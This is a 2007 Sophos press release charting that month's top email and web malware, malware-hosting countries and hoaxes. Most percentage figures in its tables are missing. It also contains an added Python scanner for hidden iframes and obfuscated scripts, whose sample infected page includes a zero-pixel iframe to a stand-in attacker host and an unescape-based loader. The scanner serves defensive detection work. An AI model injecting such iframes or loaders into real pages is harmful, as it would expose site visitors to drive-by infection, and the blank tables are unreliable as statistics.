PDF malware crashes into October 2007's top virus charts

Sophos Press Release

Malicious PDF files accounted for up to two thirds of infected email during a three-day spam campaign

IT security and control firm Sophos has revealed the most prevalent malware threats and countries causing problems for computer users around the world during October 2007.

The study, compiled by Sophos's global network of monitoring stations, has shown that a new Trojan horse, PDFex, which is typically spammed out in email messages with a malicious Adobe Acrobat PDF attachment, has smashed its way into third position in the chart. The Trojan was widely spammed out during the last few days of October, exploiting a Windows vulnerability that Microsoft had not yet patched in order to infect innocent PCs.

"PDFex only started to circulate at the very end of the month, but still managed to account for over 13 percent of all emailed malware during October. It was heavily spammed out between 26 and 28 October, and during that period it accounted for a staggering two thirds, or 66 percent, of all malware spread via email," said Carole Theriault, senior security consultant at Sophos. "PDFs have long been used in business as a means of sharing information, so the social engineering trickery of using a PDF puts insufficiently protected businesses at risk. Adobe have issued an update to their Acrobat software that fixes the problem, and eyes are now turned to Microsoft to patch the underlying flaw in Windows, which could also affect other vulnerable applications such as Skype and Firefox."

Top ten email threats

The top ten list of email-based malware threats in October 2007 reads as follows:

Position  Last month  Malware        Percentage of reports
1         2           Troj/Pushdo
2         1           W32/Netsky
3         New         Troj/PDFex
4         4           W32/Zafi
5         3           W32/Mytob
6         5           Mal/IFrame
7         Re-entry    Troj/Dloadr
8         7           W32/MyDoom
9         10          W32/Traxg
10        8           Mal/Dropper
                      Others         7.4%

Although criminals are currently using PDF files to try to infect innocent PCs with malware, SophosLabs has seen little evidence of spammers continuing to use PDF files to get their unwanted marketing messages in front of computer users.

Sophos's research also indicates a slight decrease in the percentage of infected email. Overall in October, 0.1 percent of emails carried a malicious attachment, or one in every 1,000, compared with one in every 833 during September.

Top ten web threats

Web attacks continue to pose a significant threat, with Mal/IFrame responsible for almost seven out of every ten infections found on the web by Sophos. During October, Sophos detected an average of 5,200 newly compromised webpages hosting malicious code each day, a figure similar to September's.

The top ten list of web-based malware threats in October 2007 reads as follows:

Position  Last month  Malware        Percentage of reports
1         1           Mal/IFrame
2         New         Troj/Unif
3         2           Mal/ObfJS
4         4           Troj/Fujif
5=        3           Troj/Decdec
5=        New         Troj/Zlobar
6         8           Mal/Packer
7         7           Troj/Psyme
8=        New         Troj/Rectoun
8=        New         Troj/Spywad
                      Others         3.5%

Troj/Unif is a new entry at number two this month, accounting for 15 percent of all infected webpages. It was used by hackers in a number of coordinated attacks during October, in which legitimate webpages were compromised so that visitors were silently redirected to a series of attack sites hosted in countries all over the world, from Turkey to Malaysia.

Top malware-hosting countries

The top ten list of countries hosting malware-infected webpages in October 2007 reads as follows:

Position  Last month  Country          Percentage of reports
1         1           China (inc. HK)
2         3           Russia
3         2           United States
4         4           Ukraine
5         6=          Netherlands
6         7=          Canada
7         New         Argentina
8         Re-entry    South Korea
9         5           Germany
10        New         Singapore
                      Others           6.3%

China continues to hold the top position and was responsible for hosting more than half of all the infected webpages detected by Sophos during October. Significantly, Russia and the US have swapped places this month. Russia was responsible for hosting a fifth of infected webpages in October, more than five percentage points up on September, while the US share continues to fall. The US now hosts less than 15 percent of the malicious pages served up on the internet, whereas six months ago it accounted for double that.

Ukraine and the Netherlands, this month holding the fourth and fifth positions, hosted a surprising number of infected webpages in October considering their populations and number of PCs. Although these two countries were responsible for hosting less than three percent of infected webpages between them, the sheer volume of pages being infected worldwide every day means that even a tiny percentage equates to a significant amount of malware.

"In October, we saw a large Dutch domain attacked by Mal/ObfJS. With the infection spreading to all the pages the domain served up, it significantly impacted the Netherlands' position in the chart. As the domain has now cleaned up the infection, we hope that the country will be able to slip out of Sophos's next top ten list. This should be a wake-up call to other web providers to ensure they have the right protection and up-to-date patches in place to stop a potential infection in its tracks," concluded Theriault.
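The two web-threat patterns described above, an injected iframe that pulls content from an attacker's host (Mal/IFrame, Troj/Unif) and an obfuscated script that writes such a frame at load time (Mal/ObfJS, as in the Dutch domain incident), can be spotted with a simple heuristic scan of a site's own HTML. The Python below is an added illustration, not Sophos code and not a description of how SophosLabs detects these families; the hostnames, thresholds and the two sample pages are constructed for the example.

```python
"""Heuristic scan of an HTML page for injected hidden iframes and
obfuscated loader scripts.

Added example for this article, not Sophos code.  Thresholds, regular
expressions and the sample pages below are assumptions chosen for
illustration, not a detection signature for any named family."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Frames sized 0 or 1 pixel are invisible to the visitor but still load.
TINY = {"0", "1", "0px", "1px"}
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Primitives that injected loaders use to hide the iframe they write.
OBF_JS = re.compile(r"unescape\s*\(|String\.fromCharCode|eval\s*\(", re.I)
# A long run of %XX or \xXX escapes is a decode-then-write payload.
HEX_RUN = re.compile(r"(%[0-9a-f]{2}){8,}|(\\x[0-9a-f]{2}){8,}", re.I)


class _Scanner(HTMLParser):
    """Collects (kind, detail, reasons) findings while parsing."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            # HTMLParser delivers <script> bodies via handle_data.
            self._in_script = True
            self._script = []

    def _check_iframe(self, a):
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and host != self.page_host:
            reasons.append("off-domain src")
        if a.get("width", "").strip().lower() in TINY or \
                a.get("height", "").strip().lower() in TINY:
            reasons.append("zero/one-pixel frame")
        if HIDDEN_CSS.search(a.get("style", "")):
            reasons.append("hidden by CSS")
        if reasons:
            self.findings.append(("iframe", src, reasons))

    def handle_data(self, data):
        if self._in_script:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script)
            reasons = []
            if OBF_JS.search(body):
                reasons.append("obfuscation API")
            if HEX_RUN.search(body):
                reasons.append("long escaped string")
            if reasons:
                self.findings.append(("script", body[:60], reasons))


def scan_html(html, page_host):
    """Return a list of (kind, detail, reasons) for suspicious elements.

    page_host is the site's own hostname; iframes sourced from any other
    host are flagged, so legitimate third-party embeds need an allow-list."""
    p = _Scanner(page_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample pages (not real captured content).
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="https://www.example.nl/widget" width="300" height="200"></iframe>
<script>document.getElementById('x');</script></body></html>"""

INJECTED_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="http://attacker.invalid/in.cgi?3" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D'))</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        for kind, detail, reasons in scan_html(page, "www.example.nl"):
            print(f"{name}: {kind} {detail!r}: {', '.join(reasons)}")
```

Run against a crawl of a site's own pages, the scan gives a web provider the "is every page on this domain now serving a frame I did not put there" check that the Dutch incident above called for; the off-domain test is deliberately strict, so sites that legitimately embed third-party frames should add an allow-list of expected hosts.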

Top ten hoaxes and scams

The top ten list of email hoaxes and scams in October 2007 reads as follows:

Position  Hoax                           Percentage of reports
1         Parcel Delivery Service scam
2         Olympic torch
3         Hotmail hoax
4         A virtual card for you
5         Music Top 50
6         Bonsai kitten
7         Bill Gates fortune
8         MSN is closing down
9         Welcome to the Matrix
10        Meninas da Playboy
          Others                         61.7%

Sophos experts have compiled simple best-practice guides to adopting a multi-layered defense. With blended threats, spam and phishing attacks on the rise, it has never been more important to educate end users about how best to protect themselves.

Sophos recommends companies protect themselves with a consolidated solution which can control network access and defend against the threats of spam, hackers, spyware and viruses.

More than 100 million users in 150 countries rely on Sophos’ complete security solutions as the best protection against complex threats and data loss. Simple to deploy, manage, and use, Sophos’ award-winning encryption, endpoint security, web, email, mobile and network security solutions are backed by SophosLabs - a global network of threat intelligence centers. Sophos is headquartered in Oxford, U.K., and is publicly traded on the London Stock Exchange under the symbol “SOPH.” More information is available at www.sophos.com/company.